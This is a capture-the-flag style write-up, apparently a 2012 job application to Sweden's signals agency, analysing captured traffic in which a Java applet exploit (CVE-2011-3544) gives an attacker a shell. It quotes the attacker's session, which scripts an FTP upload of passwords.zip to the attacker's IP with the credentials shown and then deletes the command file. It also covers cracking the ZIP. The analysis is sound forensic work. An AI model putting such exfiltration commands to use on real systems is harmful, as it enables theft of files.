THE NATIONAL RADIO DEFENCE ESTABLISHMENT:

NETWORK ANALYSIS

DANIEL BERAVI

2012
Network

Challenge: Suspisious Network Traffic

Table of Contents
What is this? ......................................................................................................................................... 3
Security Toolset ................................................................................................................................... 3
Approach & Solution ........................................................................................................................... 3
The Pattern of the Attack ................................................................................................................. 3
Vulnerability Exploitation................................................................................................................ 3
Encrypted ZIP .................................................................................................................................. 4
Appendices ........................................................................................................................................... 5
Appendix A ...................................................................................................................................... 5
Appendix B ...................................................................................................................................... 6
Appendix C ...................................................................................................................................... 7
Appendix D ...................................................................................................................................... 8
Appendix E ...................................................................................................................................... 9

What is this?
This is a presentation and job application to the Swedish Radio Defense Establishment. It contains an
analysis of the third public challenge, previously available at their website.

Security Toolset
Operative System: Windows 7 Professional
Protocol Analyzer A: Wireshark 1.6.8
Protocol Analyzer B: NetworkMiner 1.4.1
Zip Cracker: Accessdata PRTK 6.6.1*
Java Decompiler: JD-GUI 0.3.5
*A legal license are used provided by CS2Lab at Stockholm University

Approach & Solution

I got a good overview by NetworkMiner with structured traffic, files, credentials etc. I used this overview
when I followed the traffic in Wireshark.

The Pattern of the Attack

In the beginning of the captured data, there is DNS traffic that may seem like 192.168.58.140 is spoofing
the site FRA.se on IP 192.168.58.141.
The java applet code calls back to the attacker machine and they establish a telnet connection where the
attacker inserts the ftp commands. The user visited the site and somehow (that was unclear because there
was no http referrer). It ended up in the page with the malicious applet then the applet code run. The
victim got connected to the attacker. The attacker got remote shell and used ftp commands to upload the
ZIP from the victim to the FTP server
The FTP credentials was:
Username:ftpuser
Password: simple

Vulnerability Exploitation
I found the Happy Applet. Happy Applet does exploit the browser security if its executed. In this case, a
shell script described later was executed. By decompiling the shell exploit, I also found the commands used.
Its shown in appendix E and its:

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 7CEE-1527
Directory of C:\Documents and Settings\user\Desktop
2012-04-12 07:50 <DIR> .
2012-04-12 07:50 <DIR> ..
2010-07-23 17:39 2.839 CHANGELOG.txt
2008-02-16 14:58 1.711 Command Prompt.lnk
2008-09-04 17:07 1.308 Cygwin Bash Shell.lnk
2008-02-16 14:51 574 LogFiles.lnk
2012-04-12 10:04 83.150 passwords.zip
5 File(s) 89.582 bytes
2 Dir(s) 4.256.501.760 bytes free
C:\Documents and Settings\user\Desktop>echo USER ftpuser>cmds.txt
echo USER ftpuser>cmds.txt
C:\Documents and Settings\user\Desktop>echo simple>>cmds.txt
echo simple>>cmds.txt
C:\Documents and Settings\user\Desktop>echo PUT passwords.zip>>cmds.txt
echo PUT passwords.zip>>cmds.txt
C:\Documents and Settings\user\Desktop>echo BYE>>cmds.txt
echo BYE>>cmds.txt
C:\Documents and Settings\user\Desktop>ftp -n -s:cmds.txt 192.168.58.140
ftp -n -s:cmds.txt 192.168.58.140
USER ftpuser
PUT passwords.zip
BYE
C:\Documents and Settings\user\Desktop>del cmds.txt
del cmds.txt
C:\Documents and Settings\user\Desktop>exit
The attack was sent from IP
I exported the .Jar exploit (FRAME 2816 och 2859) and renamed it to .Jar format. Then I made a fast analyze
it in the JD-GUI (Java) Decompiler and thanks to Google I found further information:
-

http://schierlm.users.sourceforge.net/CVE-2011-3544.html
http://www.metasploit.com/modules/exploit/multi/browser/java_rhino

Encrypted ZIP
I did export the ZIP-archive (FRAME 5422) from Wireshark to my desktop and loaded it in PRTK. It went
cracked in a few seconds and the output (Appendix D) was FRA. The unencrypted PDF had the following
text:

Grattis!
Skicka ditt CV till oss, samt, i det personliga brevet, beskriv ditt tillvgagngsstt och frklara vad som
hnder i ntverkstrafiken.

Appendices
Appendix A

Appendix B

Appendix C

Appendix D

Appendix E